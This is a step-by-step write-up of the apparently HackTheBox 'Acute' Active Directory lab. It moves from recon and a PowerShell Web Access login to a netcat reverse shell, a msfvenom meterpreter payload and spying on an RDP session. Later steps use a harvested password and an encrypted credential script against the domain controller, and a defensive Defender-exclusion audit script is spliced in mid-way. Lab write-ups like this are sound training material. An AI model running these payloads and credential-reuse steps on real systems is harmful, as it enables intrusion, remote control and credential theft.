Tracks-AD-Acute

AD
50k words

nmap

└─$ sudo nmap -sS 10.10.11.145 -p- --min-rate=3000
Nmap scan report for 10.10.11.145
Host is up (1.0s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE
443/tcp open https


└─$ sudo nmap -sS 10.10.11.145 -p443 -sCV --min-rate=3000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-05 22:11 EST
Nmap scan report for 10.10.11.145
Host is up (0.58s latency).

PORT STATE SERVICE VERSION
443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=atsserver.acute.local
| Subject Alternative Name: DNS:atsserver.acute.local, DNS:atsserver
| Not valid before: 2022-01-06T06:34:58
|_Not valid after: 2030-01-04T06:34:58
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| tls-alpn:
|_ http/1.1
|_ssl-date: 2025-03-06T02:54:15+00:00; -17m47s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

User

to edavies

Only one port is open, 443, serving a web site.

The TLS certificate's subject shows that the DNS name is atsserver.acute.local; add it to /etc/hosts.

Visiting the site shows the homepage.


Only the About page responds when clicked; the other paths are unused.

In the top-right corner of the About page there is a download link for a doc file.


Scrolling down also reveals a number of user names; collect them into a wordlist.


Download the doc:

└─$ wget --no-check-certificate 'https://atsserver.acute.local/New_Starter_CheckList_v7.docx'

https://atsserver.acute.local/New_Starter_CheckList_v7.docx
Resolving atsserver.acute.local (atsserver.acute.local)... 10.10.11.145
Connecting to atsserver.acute.local (atsserver.acute.local)|10.10.11.145|:443... connected.
WARNING: The certificate of ‘atsserver.acute.local’ is not trusted.
WARNING: The certificate of ‘atsserver.acute.local’ doesn't have a known issuer.
HTTP request sent, awaiting response... 200 OK
Length: 34566 (34K) [application/vnd.openxmlformats-officedocument.wordprocessingml.document]
Saving to: ‘New_Starter_CheckList_v7.docx’

New_Starter_CheckList_v7.docx 100%[=========================================================================================================>] 33.76K --.-KB/s in 0.03s

‘New_Starter_CheckList_v7.docx’ saved [34566/34566]

Look at the metadata first:

└─$ exiftool New_Starter_CheckList_v7.docx
ExifTool Version Number : 13.00
File Name : New_Starter_CheckList_v7.docx
Directory : .
File Size : 35 kB
File Permissions : -rw-rw-r--
File Type : DOCX
File Type Extension : docx
MIME Type : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version : 20
Zip Bit Flag : 0x0006
Zip Compression : Deflated
Zip Modify Date : 1980:01:01 00:00:00
Zip CRC : 0x079b7eb2
Zip Compressed Size : 428
Zip Uncompressed Size : 2527
Zip File Name : [Content_Types].xml
Creator : FCastle
Description : Created on Acute-PC01
Last Modified By : Daniel
Revision Number : 8
Last Printed : 2021:01:04 15:54:00Z
Create Date : 2021:12:08 14:21:00Z
Modify Date : 2021:12:22 00:39:00Z
Template : Normal.dotm
Total Edit Time : 2.6 hours
Pages : 3
Words : 886
Characters : 5055
Application : Microsoft Office Word
Doc Security : None
Lines : 42
Paragraphs : 11
Scale Crop : No
Heading Pairs : Title, 1
Titles Of Parts :
Company : University of Marvel
Links Up To Date : No
Characters With Spaces : 5930
Shared Doc : No
Hyperlinks Changed : No
App Version : 16.0000

This gives the creator, FCastle, and the host name, Acute-PC01:

Creator                         : FCastle
Description : Created on Acute-PC01

It is an onboarding document that contains some web paths and related sensitive information.

Here it links to a web path:


This says that only Lois is allowed to change group membership, and only Lois can become site admin:

Lois is the only authorized personnel to change Group Membership, Contact Lois to have this approved and changed if required. Only Lois can become site admin.


It also contains an initial password, Password1!:


Visiting https://atsserver.acute.local/Acute_Staff_Access gives a PSWA (PowerShell Web Access) login page:

https://www.msb365.blog/?p=353


Build a wordlist from the user names collected on the About page:

└─$ cat userlist                  
Aileen Wallace
Charlotte Hall
Evan Davies
Ieuan Monks
Joshua Morgan
Lois Hopkins

└─$ ~/tools/wordlist/username-anarchy/username-anarchy -i userlist -C false >> u_wl

Then, following the naming convention of the document creator FCastle (first initial plus surname), filter out the candidates in the same format:

└─$ grep -E '[A-Z]{2}\w+' u_wl|tr 'A-Z' 'a-z'
awallace
chall
edavies
imonks
jmorgan
lhopkins

└─$ grep -E '[A-Z]{2}\w+' u_wl
AWallace
CHall
EDavies
IMonks
JMorgan
LHopkins

Since we don't know whether the login restricts username case, both cases have to be tried.


We have two host names: atsserver, which appears to be the domain controller/DNS server, and Acute-PC01, the host the doc was created on.

So try both.

Logging in as EDavies throws an error:


Logging in as CHall also throws an error:


Strangely, logging in to Acute-PC01 as EDavies a second time succeeds; the machine's services may not have fully started yet, since the same thing happened after a later reboot.

So the final login used:

Username: edavies
Password: Password1!

ComputerName: Acute-PC01


Once in, first pop a shell. Windows Defender is running, and I don't want to bypass it, so check whether any paths have been whitelisted.

Get-MpPreference is not permitted:

PS C:\Users\edavies\Documents> 

Get-MpPreference | select ExclusionPath

Cannot connect to CIM server. Access denied

+ CategoryInfo : ResourceUnavailable: (MSFT_MpPreference:String) [Get-MpPreference], CimJobException

+ FullyQualifiedErrorId : CimJob_BrokenCimSession,Get-MpPreference

The registry, however, shows two excluded paths:

PS C:\Users\edavies\Documents> reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths

C:\Utils REG_DWORD 0x0

C:\Windows\System32 REG_DWORD 0x0
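The two exclusions above are exactly what a defender should be hunting for: an excluded directory that ordinary users can write to, and an excluded OS directory. The following audit script is an added example and is not part of the original writeup; it reads the same registry key the writeup queried, checks the ACL of each excluded path, and rates the risk. It assumes it is run from an elevated PowerShell on the host being audited, and the function name Get-DefenderExclusionRisk is this example's own.

```powershell
# Added example, not from the original writeup: audit Windows Defender path
# exclusions and flag the ones a low-privileged user can write into or that
# cover an OS directory. Assumes an elevated PowerShell on the audited host.

function Get-DefenderExclusionRisk {
    [CmdletBinding()]
    param(
        # The key the writeup enumerated with reg query; each exclusion is a
        # value *name* under it, the DWORD data is unused.
        [string]$ExclusionKey = 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths'
    )

    # Principals whose write access turns an exclusion into a drop zone.
    $lowPrivSids = @{
        'S-1-1-0'      = 'Everyone'
        'S-1-5-11'     = 'Authenticated Users'
        'S-1-5-32-545' = 'BUILTIN\Users'
        'S-1-5-4'      = 'INTERACTIVE'
    }

    # Rights that let a principal create or change files, plus the generic
    # rights (GENERIC_WRITE / GENERIC_ALL) some ACEs carry instead.
    $fsr = [System.Security.AccessControl.FileSystemRights]
    $writeMask = [int]$fsr::CreateFiles -bor [int]$fsr::Write -bor [int]$fsr::Modify -bor
                 [int]$fsr::FullControl -bor 0x40000000 -bor 0x10000000

    # Excluding any of these disables scanning for far more than intended.
    $systemRoots = @($env:SystemRoot, (Join-Path $env:SystemRoot 'System32'), $env:SystemDrive) |
        ForEach-Object { $_.TrimEnd('\') }

    if (-not (Test-Path $ExclusionKey)) { return }

    foreach ($path in (Get-Item $ExclusionKey).GetValueNames()) {
        $writableBy = [System.Collections.Generic.List[string]]::new()
        $exists = Test-Path -LiteralPath $path
        if ($exists) {
            try {
                foreach ($ace in (Get-Acl -LiteralPath $path).Access) {
                    if ($ace.AccessControlType -ne 'Allow') { continue }
                    if (([int]$ace.FileSystemRights -band $writeMask) -eq 0) { continue }
                    try {
                        $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value
                    } catch { continue }   # unresolvable identity: skip it
                    if ($lowPrivSids.ContainsKey($sid)) { $writableBy.Add($lowPrivSids[$sid]) }
                }
            } catch {
                Write-Warning "Cannot read ACL of $path : $_"
            }
        }

        $risk = if ($systemRoots -contains $path.TrimEnd('\')) { 'Critical: OS directory excluded' }
                elseif ($writableBy.Count -gt 0) { 'High: writable by ' + ($writableBy -join ', ') }
                elseif (-not $exists) { 'Medium: path does not exist yet (can be created later)' }
                else { 'Low' }

        [PSCustomObject]@{ Path = $path; Exists = $exists; Risk = $risk }
    }
}

Get-DefenderExclusionRisk | Format-Table -AutoSize
```

On the machine in the writeup this would report C:\Utils as High (the author drops nc64.exe there a moment later) and C:\Windows\System32 as Critical. Where Get-MpPreference is permitted, (Get-MpPreference).ExclusionPath returns the same list; the registry key is worth checking anyway because, as the writeup shows, it is often readable by an ordinary user even when the CIM query is denied.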

Upload nc, since the web session drops every so often; a reverse shell is more convenient.

curl 10.10.16.4/nc64.exe -o C:\Utils\nc64.exe

Create the shell:

PS C:\utils> start-job -scriptblock {C:\utils\nc64.exe 10.10.16.4 10086 -e powershell.exe}
Id Name PSJobTypeName State HasMoreData Location Command
-- ---- ------------- ----- ----------- -------- -------
1 Job1 BackgroundJob Running True localhost C:\utils\nc64.exe 10.1...

Catch it:

└─$ nc -lvnp 10086
listening on [any] 10086 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.11.145] 49785
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Users\edavies\Documents>

to imonks

Looking around, edavies has no valuable files on this machine.

To look at domain information, start ligolo-ng as a proxy:

.\agent.exe -connect 10.10.16.4:11601 -retry -ignore-cert



└─$ ./proxy -selfcert
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
WARN[0000] Using self-signed certificates
WARN[0000] TLS Certificate fingerprint for ligolo is: 5F755516F0FA3801926C7466A89AF488302C3C7CF2419FF3F63D03A208F94D46
INFO[0000] Listening on 0.0.0.0:11601
__ _ __
/ / (_)___ _____ / /___ ____ ____ _
/ / / / __ `/ __ \/ / __ \______/ __ \/ __ `/
/ /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/ /_/ /_/\__, /
/____/ /____/

Made in France ♥ by @Nicocha30!
Version: 0.7.2-alpha

ligolo-ng » INFO[0118] Agent joined. name="ACUTE\\edavies@Acute-PC01" remote="10.10.11.145:49856"
ligolo-ng » session
? Specify a session : 1 - ACUTE\edavies@Acute-PC01 - 10.10.11.145:49856 - 1ed0b1ae-fa1e-475d-8276-1bacd1b38e38
[Agent : ACUTE\edavies@Acute-PC01] »

ldap

└─$ ldapsearch -x -H ldap://172.16.22.1  -s base
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: ALL
#

#
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=acute,DC=local
ldapServiceName: acute.local:atsserver$@ACUTE.LOCAL
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxPercentDirSyncRequests
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxBatchReturnMessages
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxDirSyncDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: MaxValRangeTransitive
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedControl: 1.2.840.113556.1.4.2090
supportedControl: 1.2.840.113556.1.4.2205
supportedControl: 1.2.840.113556.1.4.2204
supportedControl: 1.2.840.113556.1.4.2206
supportedControl: 1.2.840.113556.1.4.2211
supportedControl: 1.2.840.113556.1.4.2239
supportedControl: 1.2.840.113556.1.4.2255
supportedControl: 1.2.840.113556.1.4.2256
supportedControl: 1.2.840.113556.1.4.2309
supportedControl: 1.2.840.113556.1.4.2330
supportedControl: 1.2.840.113556.1.4.2354
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
supportedCapabilities: 1.2.840.113556.1.4.2237
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=acute,DC=local
serverName: CN=ATSSERVER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Con
figuration,DC=acute,DC=local
schemaNamingContext: CN=Schema,CN=Configuration,DC=acute,DC=local
namingContexts: DC=acute,DC=local
namingContexts: CN=Configuration,DC=acute,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=acute,DC=local
namingContexts: DC=DomainDnsZones,DC=acute,DC=local
namingContexts: DC=ForestDnsZones,DC=acute,DC=local
isSynchronized: TRUE
highestCommittedUSN: 153093
dsServiceName: CN=NTDS Settings,CN=ATSSERVER,CN=Servers,CN=Default-First-Site-
Name,CN=Sites,CN=Configuration,DC=acute,DC=local
dnsHostName: ATSSERVER.acute.local
defaultNamingContext: DC=acute,DC=local
currentTime: 20250310082450.0Z
configurationNamingContext: CN=Configuration,DC=acute,DC=local

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

The domain controller's name is ATSSERVER.acute.local.

But BloodHound complains that it cannot connect to LDAP. Damn.

So go back to Acute-PC01 and run winPEAS.

There is an RDP session:

RDP Sessions
SessID pSessionName pUserName pDomainNameState SourceIP
1 Console edavies ACUTE Active

Check the users with qwinsta:

C:\Windows\system32>qwinsta
SESSIONNAME USERNAME ID STATE TYPE DEVICE
services 0 Disc
>console edavies 1 Active
31c5ce94259d4... 65536 Listen

Normally a lab machine rarely has a user sitting in an active RDP session, so we need to see what that RDP user is doing.

Use msf for screen monitoring here; I'm not used to CS.

└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.4 LPORT=10087 -f exe -o t.exe
Warning: KRB5CCNAME environment variable not supported - unsetting
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: t.exe

Generate a payload and drop it into C:\utils:

PS C:\Utils> curl 10.10.16.4/t.exe -o t.exe
curl 10.10.16.4/t.exe -o t.exe
PS C:\Utils>

Set up msf:

msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > show options

Payload options (generic/shell_reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Wildcard Target

Add the configuration and start the listener:

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set LHOST 10.10.16.4
LHOST => 10.10.16.4
msf6 exploit(multi/handler) > set LPORT 10087
LPORT => 10087
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.16.4:10087

Run the payload:

PS C:\Utils> .\t.exe

And we get a shell:

msf6 exploit(multi/handler) > sessions
Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
58 meterpreter x64/windows ACUTE\edavies @ ACUTE-PC01 10.10.16.4:10087 -> 10.10.11.145:49793 (172.16.22.2)

For a more stable shell, migrate to another process:

meterpreter > ps

Process List
============

PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
52 656 svchost.exe
72 4 Registry
160 4244 msedge.exe x64 1 ACUTE\edavies C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
388 4 smss.exe
444 656 svchost.exe
460 656 SecurityHealthService.exe
496 484 csrss.exe
564 484 wininit.exe
572 556 csrss.exe
576 656 svchost.exe
632 556 winlogon.exe
656 564 services.exe
664 564 lsass.exe
684 656 svchost.exe
776 656 svchost.exe
784 656 svchost.exe
792 632 fontdrvhost.exe
800 564 fontdrvhost.exe
856 656 svchost.exe
884 656 svchost.exe
964 632 dwm.exe
1032 656 svchost.exe
1124 656 svchost.exe
1372 4056 conhost.exe x64 1 ACUTE\edavies C:\Windows\System32\conhost.exe
1416 656 svchost.exe
1448 656 svchost.exe
1516 656 svchost.exe
1744 656 svchost.exe
1860 4 Memory Compression
1960 656 svchost.exe
1968 656 svchost.exe
2088 656 MsMpEng.exe
2416 656 svchost.exe
2628 656 svchost.exe
2832 656 svchost.exe
3096 784 RuntimeBroker.exe x64 1 ACUTE\edavies C:\Windows\System32\RuntimeBroker.exe
3120 4056 Utilman.exe x64 1 ACUTE\edavies C:\Windows\System32\Utilman.exe
3212 656 svchost.exe x64 1 ACUTE\edavies C:\Windows\System32\svchost.exe
3220 576 sihost.exe x64 1 ACUTE\edavies C:\Windows\System32\sihost.exe
3228 784 dllhost.exe x64 1 ACUTE\edavies C:\Windows\System32\dllhost.exe
3292 656 NisSrv.exe
3324 784 RuntimeBroker.exe x64 1 ACUTE\edavies C:\Windows\System32\RuntimeBroker.exe
3340 576 MicrosoftEdgeUpdate.exe
3440 576 taskhostw.exe x64 1 ACUTE\edavies C:\Windows\System32\taskhostw.exe
3448 6372 powershell.exe x64 0 ACUTE\edavies C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
3648 4244 msedge.exe x64 1 ACUTE\edavies C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
3832 3816 explorer.exe x64 1 ACUTE\edavies C:\Windows\explorer.exe
3964 656 svchost.exe x64 1 ACUTE\edavies C:\Windows\System32\svchost.exe
4056 576 cmd.exe x64 1 ACUTE\edavies C:\Windows\System32\cmd.exe
4172 3832 OneDrive.exe x64 1 ACUTE\edavies C:\Users\edavies\AppData\Local\Microsoft\OneDrive\OneDrive.exe
4196 7020 conhost.exe
4216 3448 t.exe x64 0 ACUTE\edavies C:\Utils\t.exe
4244 3832 msedge.exe x64 1 ACUTE\edavies C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
4264 4244 msedge.exe x64 1 ACUTE\edavies C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
4296 4244 msedge.exe x64 1 ACUTE\edavies C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
4464 784 StartMenuExperienceHost.exe x64 1 ACUTE\edavies C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
4512 784 wsmprovhost.exe x64 0 ACUTE\edavies C:\Windows\System32\wsmprovhost.exe
4528 784 RuntimeBroker.exe x64 1 ACUTE\edavies C:\Windows\System32\RuntimeBroker.exe
4632 784 SearchApp.exe x64 1 ACUTE\edavies C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
4744 784 RuntimeBroker.exe x64 1 ACUTE\edavies C:\Windows\System32\RuntimeBroker.exe
4820 784 wsmprovhost.exe x64 0 ACUTE\edavies C:\Windows\System32\wsmprovhost.exe
5188 656 svchost.exe
5400 6824 powershell.exe x64 0 ACUTE\edavies C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
5436 3448 a.exe x64 0 ACUTE\edavies C:\Utils\a.exe
5648 784 ShellExperienceHost.exe x64 1 ACUTE\edavies C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
5748 656 SgrmBroker.exe
5820 656 uhssvc.exe
5880 784 MoUsoCoreWorker.exe
5964 656 svchost.exe
6048 3832 powershell.exe x64 1 ACUTE\edavies C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
6216 576 taskhostw.exe x64 1 ACUTE\edavies C:\Windows\System32\taskhostw.exe
6348 6952 t.exe x64 0 ACUTE\edavies C:\Utils\t.exe
6372 5400 nc64.exe x64 0 ACUTE\edavies C:\Utils\nc64.exe
6392 5400 conhost.exe x64 0 ACUTE\edavies C:\Windows\System32\conhost.exe
6560 6048 conhost.exe x64 1 ACUTE\edavies C:\Windows\System32\conhost.exe
6632 3448 a.exe x64 0 ACUTE\edavies C:\Utils\a.exe
6824 784 wsmprovhost.exe x64 0 ACUTE\edavies C:\Windows\System32\wsmprovhost.exe
7020 576 dsregcmd.exe

PID 3212 looks like a good candidate:

meterpreter > getpid
Current pid: 5436
meterpreter > migrate 3212
[*] Migrating from 5436 to 3212...
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 3212

Then look at the desktop. screenshare gives a live view of the screen; in practice screenshot snapshots are better, because screenshare very easily loses the shell.

meterpreter > screenshare

An HTML page pops up showing what the RDP user is doing:


The user is trying to use Enter-PSSession to open an interactive session to the domain controller atsserver as imonks, and gets an access-denied error.

Then he tries again passing credentials, and this time it returns an error that Measure-Object is not found; I looked it up, and it is probably also caused by his lacking permissions.

https://forums.powershell.org/t/powershell-remoting-broken/5113/9


After he adds -ConfigurationName pointing at dc_manage the error changes, which means dc_manage must be used, and that configuration also restricts the range of commands he can run.

I wanted to see what policy dc_manage applies, but I don't have permission to view that either. Ugh.

https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/get-pssessionconfiguration?view=powershell-7.5

PS C:\utils> Get-PSSessionConfiguration
Get-PSSessionConfiguration
Get-PSSessionConfiguration : Access is denied. To run this cmdlet, start Windows PowerShell with the "Run as
administrator" option.
At line:1 char:1
+ Get-PSSessionConfiguration
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Get-PSSessionConfiguration], InvalidOperationException
+ FullyQualifiedErrorId : System.InvalidOperationException,Microsoft.PowerShell.Commands.GetPSSessionConfiguration
Command

Note, though, that although this RDP user's Enter-PSSession is denied, we can still take his password and try other commands, for example Invoke-Command.

Running commands with the user password seen over RDP likewise requires specifying dc_manage; presumably some restriction was put in place.

For example, if the permissions on dc_manage allow only specific users, while the permissions on other configurations (such as Microsoft.PowerShell) deny ordinary users, then the user must explicitly specify -ConfigurationName dc_manage.

To forbid ordinary users from using the default configuration, something like the following can be used:

Set-PSSessionConfiguration -Name Microsoft.PowerShell -SecurityDescriptorSddl "O:NSG:BAD:P(A;;GA;;;BA)S:"

Or register a new configuration directly with Register-PSSessionConfiguration.

To see which configurations exist you need Get-PSSessionConfiguration, which the current user does not have permission to run:

PS C:\utils> Get-PSSessionConfiguration | Format-Table Name, Permission
Get-PSSessionConfiguration : Access is denied. To run this cmdlet, start Windows PowerShell with the "Run as
administrator" option.
At line:1 char:1
+ Get-PSSessionConfiguration | Format-Table Name, Permission
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Get-PSSessionConfiguration], InvalidOperationException
+ FullyQualifiedErrorId : System.InvalidOperationException,Microsoft.PowerShell.Commands.GetPSSessionConfiguration
Command

So use Invoke-Command to run the command the RDP user originally wanted to run; this time the error looks like a dc_manage restriction:

PS C:\utils> $passwd = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsplainText -Force
$passwd = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsplainText -Force
PS C:\utils> $cred = New-Object System.Management.Automation.PSCredential("acute\imonks",$passwd)
$cred = New-Object System.Management.Automation.PSCredential("acute\imonks",$passwd)
PS C:\utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { Get-Culture }
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { Get-Culture }
The term 'Get-Culture' is not recognized as the name of a cmdlet, function, script file, or operable program. Check
the spelling of the name, or if a path was included, verify that the path is correct and try again.
+ CategoryInfo : ObjectNotFound: (Get-Culture:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
+ PSComputerName : ATSSERVER

Check which commands are allowed:

PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { get-command}
CommandType Name Version Source PSComputerName
----------- ---- ------- ------ --------------
Cmdlet Get-Alias 3.1.0.0 Microsoft.PowerSh... ATSSERVER
Cmdlet Get-ChildItem 3.1.0.0 Microsoft.PowerSh... ATSSERVER
Cmdlet Get-Command 3.0.0.0 Microsoft.PowerSh... ATSSERVER
Cmdlet Get-Content 3.1.0.0 Microsoft.PowerSh... ATSSERVER
Cmdlet Get-Location 3.1.0.0 Microsoft.PowerSh... ATSSERVER
Cmdlet Set-Content 3.1.0.0 Microsoft.PowerSh... ATSSERVER
Cmdlet Set-Location 3.1.0.0 Microsoft.PowerSh... ATSSERVER
Cmdlet Write-Output 3.1.0.0 Microsoft.PowerSh... ATSSERVER

At least reading, listing and creating files is OK, so look at imonks's ~/desktop, which contains a user flag and a wm.ps1:

PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { ls ~/desktop}
Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { ls ~/desktop}


Directory: C:\Users\imonks\desktop


Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
-ar--- 10/03/2025 00:57 34 user.txt atsserver
-a---- 11/01/2022 18:04 602 wm.ps1 atsserver

Here we can see that it in turn uses the jmorgan user to Invoke-Command the Get-Volume command on the Acute-PC01 host:

PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { cat ~/desktop/wm.ps1}

$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51'
$passwd = $securepasswd | ConvertTo-SecureString
$creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
Invoke-Command -ScriptBlock {Get-Volume} -ComputerName Acute-PC01 -Credential $creds

to jmorgan

Unlike imonks, who is currently running commands on atsserver, this wm.ps1 script lives on atsserver but its call goes back to Acute-PC01. Funny.

I intended to take this password and run commands with it, but converting it threw ConvertTo-SecureString : Key not valid for use in specified state.

PS C:\Utils> $securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51'
$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51'
PS C:\Utils> $passwd = $securepasswd | ConvertTo-SecureString
$passwd = $securepasswd | ConvertTo-SecureString
ConvertTo-SecureString : Key not valid for use in specified state.
At line:1 char:27
+ $passwd = $securepasswd | ConvertTo-SecureString
+ ~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidArgument: (:) [ConvertTo-SecureString], CryptographicException
+ FullyQualifiedErrorId : ImportSecureString_InvalidArgument_CryptographicError,Microsoft.PowerShell.Commands.Conv
ertToSecureStringCommand

I found this article:

https://learn.microsoft.com/en-us/answers/questions/2102987/key-not-valid-for-use-in-specified-state


It says this happens when the secure string was encrypted by a different user, or on a different computer from the one trying to decrypt it.

So the operation still has to be done as imonks on atsserver itself.

That fails again, because the dc_manage restriction means there is no direct command execution permission:

